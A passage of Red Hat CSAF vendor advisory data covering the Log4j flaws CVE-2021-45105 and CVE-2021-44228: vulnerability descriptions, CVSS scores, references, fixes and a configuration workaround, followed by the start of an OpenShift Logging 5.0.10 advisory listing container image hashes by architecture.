"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
},
{
"cve": "CVE-2021-45105",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2021-12-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2034067"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library 2.x. when the logging configuration uses a non-default Pattern Layout with a Context Lookup. Attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup and can cause Denial of Service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security has performed an analysis of this flaw and has classified the Attack Complexity(AC) as High because there are multiple factors involved which are beyond attacker\u0027s control:\n\n- The application has to use the logging configuration using a Context Map Lookup (for example, $${ctx:loginId}) which is a non-default Pattern Layout.\n- The application developer has to use the map org.apache.logging.log4j.ThreadContext in the application code and save at-least one key (for example, ThreadContext.put(\"loginId\", \"myId\");) in the ThreadContext map object.\n- Attackers must also know this saved key name in order to exploit this flaw.\n\nNote that saving keys in this map is a non-essential usage of log4j and just an optional feature provided. Refer to https://logging.apache.org/log4j/2.x/manual/lookups.html#ContextMapLookup to know more about the Context Map Lookup feature of Log4j.\n\nLog4j 1.x is not impacted by this vulnerability. Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using ONLY the log4j-api JAR file without the log4j-core JAR file are NOT impacted by this vulnerability.\n\n\nDespite including a vulnerable version of Log4j 2.x, this vulnerability is not exploitable in Elasticsearch[0], as shipped in OpenShift Container Platform and OpenShift Logging. OpenShift 3.11 specifically does not contain any context lookups:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nThis vulnerability is therefore rated Low for Elasticsearch in OpenShift Container Platform and OpenShift Logging.\n\n[0] https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476#update-december-18-4",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45105"
},
{
"category": "external",
"summary": "RHBZ#2034067",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2034067"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45105",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45105"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45105",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45105"
},
{
"category": "external",
"summary": "https://issues.apache.org/jira/browse/LOG4J2-3230",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3230"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/19/1",
"url": "https://www.openwall.com/lists/oss-security/2021/12/19/1"
}
],
"release_date": "2021-12-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-20T09:26:34+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"category": "workaround",
"details": "For Log4j 2 versions up to and including 2.16.0, this flaw can be mitigated by:\n- In PatternLayout in the Log4j logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) like %X{loginId}.\n- Otherwise, in the Log4j logging configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern"
}
]
}
rhsa-2021_5137
Vulnerability from csaf_redhat
Published
2021-12-14 21:36
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: Openshift Logging Security Release (5.0.10)
Notes
Topic
Openshift Logging Security Release (5.0.10)
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Openshift Logging Bug Fix Release (5.0.10)
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Openshift Logging Security Release (5.0.10)\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Openshift Logging Bug Fix Release (5.0.10)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5137",
"url": "https://access.redhat.com/errata/RHSA-2021:5137"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5137.json"
}
],
"title": "Red Hat Security Advisory: Openshift Logging Security Release (5.0.10)",
"tracking": {
"current_release_date": "2024-12-12T01:18:52+00:00",
"generator": {
"date": "2024-12-12T01:18:52+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5137",
"initial_release_date": "2021-12-14T21:36:36+00:00",
"revision_history": [
{
"date": "2021-12-14T21:36:36+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T21:36:36+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:52+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "OpenShift Logging 5.0",
"product": {
"name": "OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:logging:5.0::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"product": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.0.10-2"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"product": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.0.10-2"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"product_id": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"product_id": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v5.0.10-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"product_id": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"product_id": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v5.0.10-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"product": {
